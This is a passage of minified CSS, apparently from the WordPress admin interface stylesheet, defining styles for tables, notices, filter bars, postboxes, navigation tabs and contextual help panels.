0}ol,ul{padding:0}ul{list-style:none}ol{list-style-type:decimal;margin-left:2em}ul.ul-disc{list-style:disc outside}ul.ul-square{list-style:square outside}ol.ol-decimal{list-style:decimal outside}ol.ol-decimal,ul.ul-disc,ul.ul-square{margin-left:1.8em}ol.ol-decimal>li,ul.ul-disc>li,ul.ul-square>li{margin:0 0 .5em}.ltr{direction:ltr}.code,code{font-family:Consolas,Monaco,monospace;direction:ltr;unicode-bidi:embed}code,kbd{padding:3px 5px 2px;margin:0 1px;background:#f0f0f1;background:rgba(0,0,0,.07);font-size:13px}.subsubsub{list-style:none;margin:8px 0 0;padding:0;font-size:13px;float:left;color:#646970}.subsubsub a{line-height:2;padding:.2em;text-decoration:none}.subsubsub a .count,.subsubsub a.current .count{color:#50575e;font-weight:400}.subsubsub a.current{font-weight:600;border:none}.subsubsub li{display:inline-block;margin:0;padding:0;white-space:nowrap}.widefat{border-spacing:0;width:100%;clear:both;margin:0}.widefat *{word-wrap:break-word}.widefat a,.widefat button.button-link{text-decoration:none}.widefat td,.widefat th{padding:8px 10px}.widefat thead td,.widefat thead th{border-bottom:1px solid #c3c4c7}.widefat tfoot td,.widefat tfoot th{border-top:1px solid #c3c4c7;border-bottom:none}.widefat .no-items td{border-bottom-width:0}.widefat td{vertical-align:top}.widefat td,.widefat td ol,.widefat td p,.widefat td ul{font-size:13px;line-height:1.5em}.widefat tfoot td,.widefat th,.widefat thead td{text-align:left;line-height:1.3em;font-size:14px}.updates-table td input,.widefat tfoot td input,.widefat th input,.widefat thead td input{margin:0 0 0 8px;padding:0;vertical-align:text-top}.widefat .check-column{width:2.2em;padding:6px 0 25px;vertical-align:top}.widefat tbody th.check-column{padding:9px 0 22px}.updates-table tbody td.check-column,.widefat tbody th.check-column,.widefat tfoot td.check-column,.widefat thead td.check-column{padding:11px 0 0 3px}.widefat tfoot td.check-column,.widefat thead td.check-column{padding-top:4px;vertical-align:middle}.update-php div.error,.update-php div.updated{margin-left:0}.js-update-details-toggle .dashicons{text-decoration:none}.js-update-details-toggle[aria-expanded=true] .dashicons::before{content:"\f142";content:"\f142"/''}.no-js .widefat tfoot .check-column input,.no-js .widefat thead .check-column input{display:none}.column-comments,.column-links,.column-posts,.widefat .num{text-align:center}.widefat th#comments{vertical-align:middle}.wrap{margin:10px 20px 0 2px}.postbox .inside h2,.wrap [class$=icon32]+h2,.wrap h1,.wrap>h2:first-child{font-size:23px;font-weight:400;margin:0;padding:9px 0 4px;line-height:1.3}.wrap h1.wp-heading-inline{display:inline-block;margin-right:5px}.wp-header-end{visibility:hidden;margin:-2px 0 0}.subtitle{margin:0;padding-left:25px;color:#50575e;font-size:14px;font-weight:400;line-height:1}.subtitle strong{word-break:break-all}.wrap .add-new-h2,.wrap .add-new-h2:active,.wrap .page-title-action,.wrap .page-title-action:active{display:inline-block;position:relative;box-sizing:border-box;cursor:pointer;white-space:nowrap;text-decoration:none;text-shadow:none;top:-3px;margin-left:4px;border:1px solid #2271b1;border-radius:2px;background:0 0;font-size:13px;font-weight:500;min-height:32px;line-height:2.30769231;color:#2271b1;padding:0 12px;-webkit-appearance:none}.wrap .wp-heading-inline+.page-title-action{margin-left:0}.wrap .add-new-h2:hover,.wrap .page-title-action:hover{border-color:#0a4b78;color:#0a4b78}.page-title-action:focus{color:#0a4b78}.form-table th label[for=WPLANG] .dashicons,.form-table th label[for=locale] .dashicons{margin-left:5px}.wrap .page-title-action:focus{border-color:#3582c4;box-shadow:0 0 0 1px #3582c4;outline:2px solid transparent}.wrap h1.long-header{padding-right:0}.wp-dialog{background-color:#fff}#available-widgets .widget-top:hover,#widgets-left .widget-in-question .widget-top,#widgets-left .widget-top:hover,.widgets-chooser ul,div#widgets-right .widget-top:hover{border-color:#8c8f94;box-shadow:0 1px 2px rgba(0,0,0,.1)}.sorthelper{background-color:#c5d9ed}.ac_match,.subsubsub a.current{color:#000}.alternate,.striped>tbody>:nth-child(odd),ul.striped>:nth-child(odd){background-color:#f6f7f7}.bar{background-color:#f0f0f1;border-right-color:var(--wp-admin-theme-color)}.highlight{background-color:rgba(var(--wp-admin-theme-color--rgb),.08);color:#3c434a}.wp-ui-primary{color:#fff;background-color:#2c3338}.wp-ui-text-primary{color:#2c3338}.wp-ui-highlight{color:#fff;background-color:#2271b1}.wp-ui-text-highlight{color:#2271b1}.wp-ui-notification{color:#fff;background-color:#d63638}.wp-ui-text-notification{color:#d63638}.wp-ui-text-icon{color:#8c8f94}img.emoji{display:inline!important;border:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-.1em!important;background:0 0!important;padding:0!important;box-shadow:none!important}#nav-menu-footer,#nav-menu-header,#your-profile #rich_editing,.checkbox,.control-section .accordion-section-title,.menu-item-handle,.postbox .hndle,.side-info,.sidebar-name,.stuffbox .hndle,.widefat tfoot td,.widefat tfoot th,.widefat thead td,.widefat thead th,.widget .widget-top{line-height:1.4em}.menu-item-handle,.widget .widget-top{background:#f6f7f7;color:#1d2327}.stuffbox .hndle{border-bottom:1px solid #c3c4c7}.quicktags{background-color:#c3c4c7;color:#000;font-size:12px}.icon32{display:none}#bulk-titles .ntdelbutton:before,.notice-dismiss:before,.tagchecklist .ntdelbutton .remove-tag-icon:before,.welcome-panel .welcome-panel-close:before{background:0 0;color:#1e1e1e;content:"\f335";content:"\f335"/'';display:block;font:normal 20px/1 dashicons;height:1em;text-align:center;width:1em;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.welcome-panel .welcome-panel-close:before{margin:0}.tagchecklist .ntdelbutton .remove-tag-icon:before{margin-left:2px;border-radius:50%;color:var(--wp-admin-theme-color,#3858e9);line-height:1.1}.tagchecklist .ntdelbutton:focus{outline:0}#bulk-titles .ntdelbutton:focus:before,#bulk-titles .ntdelbutton:hover:before,.tagchecklist .ntdelbutton:focus .remove-tag-icon:before,.tagchecklist .ntdelbutton:hover .remove-tag-icon:before{color:#d63638}.tagchecklist .ntdelbutton:focus .remove-tag-icon:before{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.key-labels label{line-height:24px}b,strong{font-weight:600}.pre{white-space:pre-wrap;word-wrap:break-word}.howto{color:#646970;display:block}p.install-help{margin:8px 0;font-style:italic}.no-break{white-space:nowrap}hr{border:0;border-top:1px solid #dcdcde;border-bottom:1px solid #f6f7f7}#all-plugins-table .plugins a.delete,#delete-link a.delete,#media-items a.delete,#media-items a.delete-permanently,#nav-menu-footer .menu-delete,#search-plugins-table .plugins a.delete,.plugins a.delete,.privacy_requests .remove-personal-data .remove-personal-data-handle,.row-actions span.delete a,.row-actions span.spam a,.row-actions span.trash a,.submitbox .submitdelete,a#remove-post-thumbnail{color:#b32d2e}#all-plugins-table .plugins a.delete:hover,#delete-link a.delete:hover,#media-items a.delete-permanently:hover,#media-items a.delete:hover,#nav-menu-footer .menu-delete:hover,#search-plugins-table .plugins a.delete:hover,.file-error,.plugins a.delete:hover,.privacy_requests .remove-personal-data .remove-personal-data-handle:hover,.row-actions .delete a:hover,.row-actions .spam a:hover,.row-actions .trash a:hover,.submitbox .submitdelete:hover,a#remove-post-thumbnail:hover,abbr.required,span.required{color:#b32d2e;border:none}.application-password-display .success{color:#007017;margin-left:.5rem}#major-publishing-actions{padding:10px;clear:both;border-top:1px solid #dcdcde;background:#f6f7f7;display:flex;flex-wrap:wrap;align-items:center;justify-content:space-between}#delete-action{line-height:2.30769231}#delete-link a{text-decoration:none}#publishing-action{text-align:right;margin-left:auto;line-height:1.9}#publishing-action .spinner{float:none}#misc-publishing-actions{padding:6px 0 0}.misc-pub-section{padding:6px 10px 8px}.misc-pub-filename,.word-wrap-break-word{word-wrap:break-word}#minor-publishing-actions{padding:10px 10px 0;text-align:right}#save-post{float:left}.preview{float:right}#sticky-span{margin-left:18px}.approve,.unapproved .unapprove{display:none}.spam .approve,.trash .approve,.unapproved .approve{display:inline}td.action-links,th.action-links{text-align:right}#misc-publishing-actions .notice{margin-left:10px;margin-right:10px}.wp-filter{display:inline-block;position:relative;box-sizing:border-box;margin:12px 0 25px;padding:0 10px;width:100%;box-shadow:0 1px 1px rgba(0,0,0,.04);border:1px solid #c3c4c7;background:#fff;color:#50575e;font-size:13px}.wp-filter a{text-decoration:none}.filter-count{display:inline-block;vertical-align:middle;min-width:4em}.filter-count .count,.title-count{display:inline-block;position:relative;top:-1px;padding:4px 10px;border-radius:30px;background:#646970;color:#fff;font-size:14px;font-weight:600}.title-count{display:inline;top:-3px;margin-left:5px;margin-right:20px}.filter-items{float:left}.filter-links{display:inline-block;margin:0}.filter-links li{display:inline-block;margin:0}.filter-links li>a{display:inline-block;margin:0 10px;padding:15px 0;border-bottom:4px solid #fff;color:#646970;cursor:pointer}.filter-links .current{box-shadow:none;border-bottom:4px solid var(--wp-admin-theme-color);color:#1d2327}.filter-links li>a:focus,.filter-links li>a:hover,.show-filters .filter-links a.current:focus,.show-filters .filter-links a.current:hover{color:var(--wp-admin-theme-color)}.wp-filter .search-form{float:right;display:flex;align-items:center;column-gap:.5rem}.wp-filter .search-form input[type=search]{width:280px;max-width:100%}.wp-filter .search-form select{margin:0}.wp-filter .search-form input[type=search]{min-height:32px;padding:0 8px}.wp-filter .filter-items select,.wp-filter .search-form select{min-height:32px;line-height:2.14285714;padding:0 24px 0 8px}.wp-filter .button{min-height:32px;line-height:2.30769231;padding:0 12px}.plugin-install-php .wp-filter,.upload-php .wp-filter{display:flex;flex-wrap:wrap;justify-content:space-between;align-items:center}.no-js .wp-filter .search-form.search-plugins .button,.wp-filter .search-form.search-plugins .wp-filter-search,.wp-filter .search-form.search-plugins select{display:inline-block;vertical-align:top}.wp-filter .button.drawer-toggle{margin:10px 9px 0;padding:0 10px 0 6px;border-color:transparent;background-color:transparent;color:#646970;vertical-align:baseline;box-shadow:none}.wp-filter .drawer-toggle:before{content:"\f111";content:"\f111"/'';margin:0 5px 0 0;color:#646970;font:normal 16px/1 dashicons;vertical-align:text-bottom;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.wp-filter .button.drawer-toggle:focus,.wp-filter .button.drawer-toggle:hover,.wp-filter .drawer-toggle:focus:before,.wp-filter .drawer-toggle:hover:before{background-color:transparent;color:var(--wp-admin-theme-color)}.wp-filter .button.drawer-toggle:focus:active,.wp-filter .button.drawer-toggle:hover{border-color:transparent}.wp-filter .button.drawer-toggle:focus{border-color:var(--wp-admin-theme-color)}.wp-filter .button.drawer-toggle:active{background:0 0;box-shadow:none;transform:none}.wp-filter .drawer-toggle.current:before{color:#fff}.filter-drawer,.wp-filter .favorites-form{display:none;margin:0 -10px 0 -20px;padding:20px;border-top:1px solid #f0f0f1;background:#f6f7f7;overflow:hidden}.wp-filter .favorites-form .favorites-username{display:flex;align-items:center;flex-wrap:wrap;gap:.5rem}.wp-filter .favorites-form .favorites-username input{margin:0}.show-favorites-form .favorites-form,.show-filters .filter-drawer{display:block}.show-filters .filter-links a.current{border-bottom:none}.show-filters .wp-filter .button.drawer-toggle{border-radius:2px;background:#646970;color:#fff}.show-filters .wp-filter .drawer-toggle:focus,.show-filters .wp-filter .drawer-toggle:hover{background:var(--wp-admin-theme-color)}.show-filters .wp-filter .drawer-toggle:before{color:#fff}.filter-group{box-sizing:border-box;position:relative;float:left;margin:0 1% 0 0;padding:20px 10px 10px;width:24%;background:#fff;border:1px solid #dcdcde;box-shadow:0 1px 1px rgba(0,0,0,.04)}.filter-group legend{position:absolute;top:10px;display:block;margin:0;padding:0;font-size:1em;font-weight:600}.filter-drawer .filter-group-feature{margin:28px 0 0;list-style-type:none;font-size:12px}.filter-drawer .filter-group-feature input,.filter-drawer .filter-group-feature label{line-height:1.4}.filter-drawer .filter-group-feature input{position:absolute;margin:0}.filter-group .filter-group-feature label{display:block;margin:14px 0 14px 23px}.filter-drawer .buttons{clear:both;margin-bottom:20px}.filter-drawer .filter-group+.buttons{margin-bottom:0;padding-top:20px}.filter-drawer .buttons .button span{display:inline-block;opacity:.8;font-size:12px;text-indent:10px}.wp-filter .button.clear-filters{display:none;margin-left:10px}.wp-filter .button-link.edit-filters{padding:0 5px;line-height:2.2}.filtered-by{display:none;margin:0}.filtered-by>span{font-weight:600}.filtered-by a{margin-left:10px}.filtered-by .tags{display:flex;align-items:flex-start;flex-wrap:wrap;gap:8px}.filtered-by .tag{padding:4px 8px;border:1px solid #dcdcde;box-shadow:0 1px 1px rgba(0,0,0,.04);background:#fff;font-size:11px}.filters-applied .filter-drawer .buttons,.filters-applied .filter-drawer br,.filters-applied .filter-group{display:none}.filters-applied .filtered-by{display:flex;align-items:center;flex-wrap:wrap;gap:10px}.filters-applied .filter-drawer{padding:20px}.error .content-filterable,.loading-content .content-filterable,.show-filters .content-filterable,.show-filters .favorites-form,.show-filters.filters-applied.loading-content .content-filterable{display:none}.show-filters.filters-applied .content-filterable{display:block}.loading-content .spinner{display:block;margin:40px auto 0;float:none}@media only screen and (max-width:1138px){.wp-filter .search-form{margin:11px 0}}@media only screen and (max-width:1250px){.wp-filter:has(.plugin-install-search) .search-form{margin:11px 0}}@media only screen and (max-width:1120px){.filter-drawer{border-bottom:1px solid #f0f0f1}.filter-group{margin-bottom:0;margin-top:5px;width:100%}.filter-group li{margin:10px 0}}@media only screen and (max-width:1000px){.filter-items{float:none}.wp-filter .media-toolbar-primary,.wp-filter .media-toolbar-secondary,.wp-filter .search-form{float:none;position:relative;max-width:100%}.wp-filter .search-form{margin:11px 0;flex-wrap:wrap;row-gap:10px}}@media only screen and (max-width:782px){.filter-group li{padding:0;width:50%}.wp-filter .search-form input[type=search]{min-height:40px;padding:0 12px}.wp-filter .filter-items select,.wp-filter .search-form select{min-height:40px;padding:0 24px 0 12px}}@media only screen and (max-width:320px){.filter-count{display:none}.wp-filter .drawer-toggle{margin:10px 0}.filter-group li,.wp-filter .search-form input[type=search]{width:100%}}.notice,div.error,div.updated{background:#fff;border:none;border-left:4px solid #c3c4c7;box-shadow:none;margin:5px 15px 2px;padding:8px 12px}div[class=update-message]{padding:.5em 12px .5em 0}.form-table td .notice p,.notice p,.notice-title,div.error p,div.updated p{margin:.5em 0;padding:0;font-size:13px;line-height:1.54;color:#1e1e1e}div.error a,div.notice a,div.updated a{color:var(--wp-admin-theme-color-darker-10);text-decoration:underline}div.error a:hover,div.notice a:hover,div.updated a:hover{color:var(--wp-admin-theme-color-darker-20)}div.error a:focus,div.notice a:focus,div.updated a:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid transparent;border-radius:2px}.notice-alt{box-shadow:none}.notice-large{padding:10px 20px}.notice-title{display:inline-block;color:#1d2327;font-size:18px}.wp-core-ui .notice.is-dismissible{padding-right:48px;position:relative}.notice-dismiss{position:absolute;top:12px;right:12px;border:none;margin:0;padding:0;background:0 0;color:#1e1e1e;cursor:pointer;width:24px;height:24px;display:flex;align-items:center;justify-content:center;border-radius:2px}.notice-dismiss:active:before,.notice-dismiss:hover:before{color:#1e1e1e;opacity:.7}.notice-dismiss:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid transparent}.notice-dismiss:focus:before{color:#1e1e1e}.notice-success,div.updated{border-left-color:#4ab866;background-color:#eff9f1}.notice-success.notice-alt,div.updated.notice-alt{background-color:#eff9f1}.notice-warning{border-left-color:#f0b849;background-color:#fef8ee}.notice-warning.notice-alt{background-color:#fef8ee}.notice-error,div.error{border-left-color:#cc1818;background-color:#fcf0f0}.notice-error.notice-alt,div.error.notice-alt{background-color:#fcf0f0}.notice-info{border-left-color:#3858e9;background-color:#fff}.notice-info.notice-alt{background-color:#fff}#plugin-information-footer .update-now:not(.button-disabled):before{color:#d63638;content:"\f463";content:"\f463"/'';display:inline-block;font:normal 20px/1 dashicons;margin:-3px 5px 0 -2px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;vertical-align:middle}#plugin-information-footer .notice{margin-top:-5px}.button.activated-message:before,.button.activating-message:before,.button.installed:before,.button.installing:before,.button.updated-message:before,.button.updating-message:before,.import-php .updating-message:before,.update-message p:before,.updated-message p:before,.updating-message p:before{display:inline-block;font:normal 20px/1 dashicons;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;vertical-align:top}.media-upload-form .notice,.media-upload-form div.error,.wrap .notice,.wrap div.error,.wrap div.updated{margin:5px 0 15px}.wrap #templateside .notice{display:block;margin:0;padding:5px 8px;font-weight:600;text-decoration:none}.wrap #templateside span.notice{margin-left:-12px}#templateside li.notice a{padding:0}.button.activating-message:before,.button.installing:before,.button.updating-message:before,.import-php .updating-message:before,.update-message p:before,.updating-message p:before{color:#d63638;content:"\f463";content:"\f463"/''}.button.activating-message:before,.button.installing:before,.button.updating-message:before,.import-php .updating-message:before,.plugins .column-auto-updates .dashicons-update.spin,.theme-overlay .theme-autoupdate .dashicons-update.spin,.updating-message p:before{animation:rotation 2s infinite linear}@media (prefers-reduced-motion:reduce){.button.activating-message:before,.button.installing:before,.button.updating-message:before,.import-php .updating-message:before,.plugins .column-auto-updates .dashicons-update.spin,.theme-overlay .theme-autoupdate .dashicons-update.spin,.updating-message p:before{animation:none}}.theme-overlay .theme-autoupdate .dashicons-update.spin{margin-right:3px}.button.activated-message:before,.button.updated-message:before,.installed p:before,.updated-message p:before{color:#68de7c;content:"\f147";content:"\f147"/''}.update-message.notice-error p:before{color:#d63638;content:"\f534";content:"\f534"/''}.import-php .updating-message:before,.wrap .notice p:before{margin-right:6px}.import-php .updating-message:before{vertical-align:bottom}#update-nag,.update-nag{display:inline-block;line-height:1.4;padding:11px 15px;font-size:14px;margin:25px 20px 0 2px}ul#dismissed-updates{display:none}#dismissed-updates li>p{margin-top:0}#dismiss,#undismiss{margin-left:.5em}form.upgrade{margin-top:8px}form.upgrade .hint{font-style:italic;font-size:85%;margin:-.5em 0 2em}.update-php .spinner{float:none;margin:-4px 0}h2.wp-current-version{margin-bottom:.3em}p.update-last-checked{margin-top:0}p.auto-update-status{margin-top:2em;line-height:1.8}#ajax-loading,.ajax-feedback,.ajax-loading,.imgedit-wait-spin,.list-ajax-loading{visibility:hidden}#ajax-response.alignleft{margin-left:2em}.button.activated-message:before,.button.activating-message:before,.button.installed:before,.button.installing:before,.button.updated-message:before,.button.updating-message:before{margin:0 5px 0 -2px;line-height:1.9;vertical-align:top}#plugin-information-footer .button{padding:0 14px;line-height:2.71428571;font-size:14px;vertical-align:middle;min-height:40px;margin-bottom:4px}#plugin-information-footer .button.activated-message:before,#plugin-information-footer .button.activating-message:before,#plugin-information-footer .button.installed:before,#plugin-information-footer .button.installing:before,#plugin-information-footer .button.updated-message:before,#plugin-information-footer .button.updating-message:before{margin:0 5px 0 -2px;line-height:1.9;vertical-align:top}#plugin-information-footer .button.update-now.updating-message:before{margin:0 5px 0 -2px}.button-primary.activating-message:before,.button-primary.updating-message:before{color:#fff}.button-primary.activated-message:before,.button-primary.updated-message:before{color:#9ec2e6}.button.activated-message,.button.updated-message{transition-property:border,background,color;transition-duration:.05s;transition-timing-function:ease-in-out}#adminmenu a,#catlist a,#taglist a{text-decoration:none}#contextual-help-wrap,#screen-options-wrap{margin:0;padding:8px 20px 12px;position:relative}#contextual-help-wrap{overflow:auto;margin-left:0}#screen-meta-links{float:right;margin:0 20px 0 0}#screen-meta{display:none;margin:0 20px -1px 0;position:relative;background-color:#fff;border:1px solid #c3c4c7;border-top:none;box-shadow:0 0 0 transparent}#contextual-help-link-wrap,#screen-options-link-wrap{float:left;margin:0 0 0 6px}#screen-meta-links .screen-meta-toggle{position:relative;top:0}#screen-meta-links .show-settings{border:1px solid #c3c4c7;border-top:none;height:auto;margin-bottom:0;padding:0 6px 0 16px;background:#fff;border-radius:0 0 4px 4px;color:#646970;box-shadow:0 0 0 transparent;transition:box-shadow .1s linear}#screen-meta-links .show-settings:active,#screen-meta-links .show-settings:focus,#screen-meta-links .show-settings:hover{color:#2c3338}#screen-meta-links .show-settings:focus{border-color:var(--wp-admin-theme-color,#3858e9);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#screen-meta-links .show-settings:active{transform:none}#screen-meta-links .show-settings:after{right:0;content:"\f140";content:"\f140"/'';font:normal 20px/1.5 dashicons;display:inline-block;padding:0 5px 0 0;vertical-align:top;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none}#screen-meta-links .screen-meta-active:after{content:"\f142";content:"\f142"/''}.toggle-arrow{background-repeat:no-repeat;background-position:top left;background-color:transparent;height:22px;line-height:22px;display:block}.toggle-arrow-active{background-position:bottom left}#contextual-help-wrap h5,#screen-options-wrap h5,#screen-options-wrap legend{margin:0;padding:8px 0;font-size:13px;font-weight:600}.metabox-prefs label{display:inline-block;padding-right:15px;line-height:2.35}#number-of-columns{display:inline-block;vertical-align:middle;line-height:30px}.metabox-prefs input[type=checkbox]{margin-top:0;margin-right:6px}.metabox-prefs label input,.metabox-prefs label input[type=checkbox]{margin:-4px 5px 0 0}.metabox-prefs .columns-prefs label input{margin:-1px 2px 0 0}.metabox-prefs label a{display:none}.metabox-prefs .screen-options input,.metabox-prefs .screen-options label{margin-top:0;margin-bottom:0;vertical-align:middle}.metabox-prefs .screen-options .screen-per-page{margin-right:15px;padding-right:0}.metabox-prefs .screen-options label{line-height:2.2;padding-right:0}.screen-options+.screen-options{margin-top:10px}.metabox-prefs .submit{margin-top:1em;padding:0}#contextual-help-wrap{padding:0}#contextual-help-columns{position:relative}#contextual-help-back{position:absolute;top:0;bottom:0;left:150px;right:170px;border:1px solid #c3c4c7;border-top:none;border-bottom:none;background:rgba(var(--wp-admin-theme-color--rgb),.08)}#contextual-help-wrap.no-sidebar #contextual-help-back{right:0;border-right-width:0;border-bottom-right-radius:2px}.contextual-help-tabs{float:left;width:150px;margin:0}.contextual-help-tabs ul{margin:1em 0}.contextual-help-tabs li{margin-bottom:0;list-style-type:none;border-style:solid;border-width:0 0 0 2px;border-color:transparent}.contextual-help-tabs a{display:block;padding:5px 5px 5px 12px;line-height:1.4;text-decoration:none;border:1px solid transparent;border-right:none;border-left:none}.contextual-help-tabs a:hover{color:#2c3338}.contextual-help-tabs .active{padding:0;margin:0 -1px 0 0;border-left:2px solid var(--wp-admin-theme-color);background:color-mix(in srgb,var(--wp-admin-theme-color) 8%,#fff);box-shadow:0 2px 0 rgba(0,0,0,.02),0 1px 0 rgba(0,0,0,.02)}.contextual-help-tabs .active a{border-color:#c3c4c7;color:#2c3338}.contextual-help-tabs-wrap{padding:0 20px;overflow:auto}.help-tab-content{display:none;margin:0 22px 12px 0;line-height:1.6}.help-tab-content.active{display:block}.help-tab-content ul li{list-style-type:disc;margin-left:18px}.contextual-help-sidebar{width:150px;float:right;padding:0 8px 0 12px;overflow:auto}html.wp-toolbar{padding-top:var(--wp-admin--admin-bar--height);box-sizing:border-box;-ms-overflow-style:scrollbar}.widefat td,.widefat th{color:#50575e}.widefat tfoot td,.widefat th,.widefat thead td{font-weight:400}.widefat tfoot tr td,.widefat tfoot tr th,.widefat thead tr td,.widefat thead tr th{color:#2c3338}.widefat td p{margin:2px 0 .8em}.widefat ol,.widefat p,.widefat ul{color:#2c3338}.widefat .column-comment p{margin:.6em 0}.widefat .column-comment ul{list-style:initial;margin-left:2em}.postbox-container{float:left}.postbox-container .meta-box-sortables{box-sizing:border-box}#wpbody-content .metabox-holder{padding-top:10px}.metabox-holder .postbox-container .meta-box-sortables{min-height:1px;position:relative}#post-body-content{width:100%;min-width:463px;float:left}#post-body.columns-2 #postbox-container-1{float:right;margin-right:-300px;width:280px}#post-body.columns-2 #side-sortables{min-height:250px}@media only screen and (max-width:799px){#wpbody-content .metabox-holder .postbox-container .empty-container{outline:0;height:0;min-height:0}}.js .postbox .hndle,.js .widget .widget-top{cursor:move}.js .postbox .hndle.is-non-sortable,.js .widget .widget-top.is-non-sortable{cursor:auto}.hndle a{font-size:12px;font-weight:400}.postbox-header{display:flex;align-items:center;justify-content:space-between;border-bottom:1px solid #c3c4c7}.postbox-header .hndle{flex-grow:1;display:flex;justify-content:space-between;align-items:center}.postbox-header .handle-actions{flex-shrink:0}.postbox .handle-order-higher,.postbox .handle-order-lower,.postbox .handlediv{width:1.62rem;height:1.62rem;margin:0;padding:0;border:0;background:0 0;cursor:pointer}.postbox .handle-order-higher,.postbox .handle-order-lower{color:#646970;width:1.62rem}.edit-post-meta-boxes-area .postbox .handle-order-higher,.edit-post-meta-boxes-area .postbox .handle-order-lower{width:44px;height:44px;color:#1d2327}.postbox .handle-order-higher[aria-disabled=true],.postbox .handle-order-lower[aria-disabled=true]{cursor:default;color:#a7aaad}.sortable-placeholder:not(.empty-container .sortable-placeholder){border:1px dashed #c3c4c7;border-radius:8px;margin-bottom:20px}.postbox,.stuffbox{margin-bottom:20px;padding:0;line-height:1}.postbox.closed .postbox-header{border-bottom:0}.postbox .hndle,.stuffbox .hndle{-webkit-user-select:none;user-select:none}.postbox .inside{padding:0 12px 12px;line-height:1.4;font-size:13px}.stuffbox .inside{padding:0;line-height:1.4;font-size:13px;margin-top:0}.postbox .inside{margin:11px 0;position:relative}.postbox .inside>p:last-child,.rss-widget ul li:last-child{margin-bottom:1px!important}.postbox.closed h3{border:none;box-shadow:none}.postbox table.form-table{margin-bottom:0}.postbox table.widefat{box-shadow:none}.temp-border{border:1px dotted #c3c4c7}.columns-prefs label{padding:0 10px 0 0}#adminmenu .wp-submenu li.current,#adminmenu .wp-submenu li.current a,#adminmenu .wp-submenu li.current a:hover,#comment-status-display,#dashboard_right_now .versions .b,#ed_reply_toolbar #ed_reply_strong,#pass-strength-result.short,#pass-strength-result.strong,#post-status-display,#post-visibility-display,.feature-filter .feature-name,.item-controls .item-order a,.media-item .percent,.plugins .name{font-weight:600}#wpfooter{position:absolute;bottom:0;left:0;right:0;padding:10px 20px;color:#50575e}#wpfooter p{font-size:13px;margin:0;line-height:1.55}#footer-thankyou{font-style:italic}.nav-tab{float:left;border:1px solid #c3c4c7;border-bottom:none;margin-left:.5em;padding:5px 10px;font-size:14px;line-height:1.71428571;font-weight:600;background:#dcdcde;color:#50575e;text-decoration:none;white-space:nowrap}.nav-tab-small .nav-tab,h3 .nav-tab{padding:5px 14px;font-size:12px;line-height:1.33}.nav-tab:focus,.nav-tab:hover{background-color:#fff;color:#3c434a}.nav-tab-active,.nav-tab:focus:active{box-shadow:none}.nav-tab-active{margin-bottom:-1px;color:#3c434a}.nav-tab-active,.nav-tab-active:focus,.nav-tab-active:focus:active,.nav-tab-active:hover{border-bottom:1px solid #f0f0f1;background:#f0f0f1;color:#000}.nav-tab-wrapper,.wrap h2.nav-tab-wrapper,h1.nav-tab-wrapper{border-bottom:1px solid #c3c4c7;margin:0;padding-top:9px;padding-bottom:0;line-height:inherit}.nav-tab-wrapper:not(.wp-clearfix):after{content:"";display:table;clear:both}.spinner{background:url(../images/spinner.gif) no-repeat;background-size:20px 20px;display:inline-block;visibility:hidden;float:right;vertical-align:middle;opacity:.7;width:20px;height:20px;margin:10px 10px 0}.loading-content .spinner,.spinner.is-active{visibility:visible}#template>div{margin-right:16em}#template .notice{margin-top:1em;margin-right:3%}#template .notice p{width:auto}#template .submit .spinner{float:none;vertical-align:top}.metabox-holder .postbox>h3,.metabox-holder .stuffbox>h3,.metabox-holder h2.hndle,.metabox-holder h3.hndle{font-size:14px;padding:8px 12px;margin:0;line-height:1.4}.nav-menus-php .metabox-holder h3{padding:0}.accordion-container h3.accordion-section-title{padding:0!important}.accordion-section-title button.accordion-trigger,.nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger{background:inherit;color:#1d2327;display:block;position:relative;text-align:left;width:100%;outline:0;border:0;padding:10px 10px 11px 14px;line-height:1.5;cursor:pointer}.accordion-section-title button.accordion-trigger:focus,.nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.accordion-section-title span.dashicons.dashicons-arrow-down,.nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down{position:absolute;right:10px;left:auto;color:#787c82;border-radius:50px;top:50%;transform:translateY(-50%)}.accordion-section-title:hover span.dashicons.dashicons-arrow-down,.nav-menus-php .metabox-holder .accordion-section-title:hover span.dashicons.dashicons-arrow-down{color:#1d2327}.accordion-section-title span.dashicons.dashicons-arrow-down::before,.nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down::before{position:relative;left:-1px}.accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down,.nav-menus-php .metabox-holder .accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down{transform:rotate(180deg) translate(0,50%)}#templateside ul li a{text-decoration:none}.plugin-install #description,.plugin-install-network #description{width:60%}table .column-rating,table .column-visible,table .vers{text-align:left}.attention,.error-message{color:#d63638;font-weight:600}body.iframe{height:98%}.lp-show-latest p{display:none}.lp-show-latest .lp-error p,.lp-show-latest p:last-child{display:block}.media-icon{width:62px;text-align:center}.media-icon img{border:1px solid #dcdcde;border:1px solid rgba(0,0,0,.07)}#howto{font-size:11px;margin:0 5px;display:block}.importers{font-size:16px;width:auto}.importers td{padding-right:14px;line-height:1.4}.importers .import-system{max-width:250px}.importers td.desc{max-width:500px}.importer-action,.importer-desc,.importer-title{display:block}.importer-title{color:#000;font-size:14px;font-weight:400;margin-bottom:.2em}.importer-action{line-height:1.55;color:#50575e;margin-bottom:1em}#post-body #post-body-content #namediv h2,#post-body #post-body-content #namediv 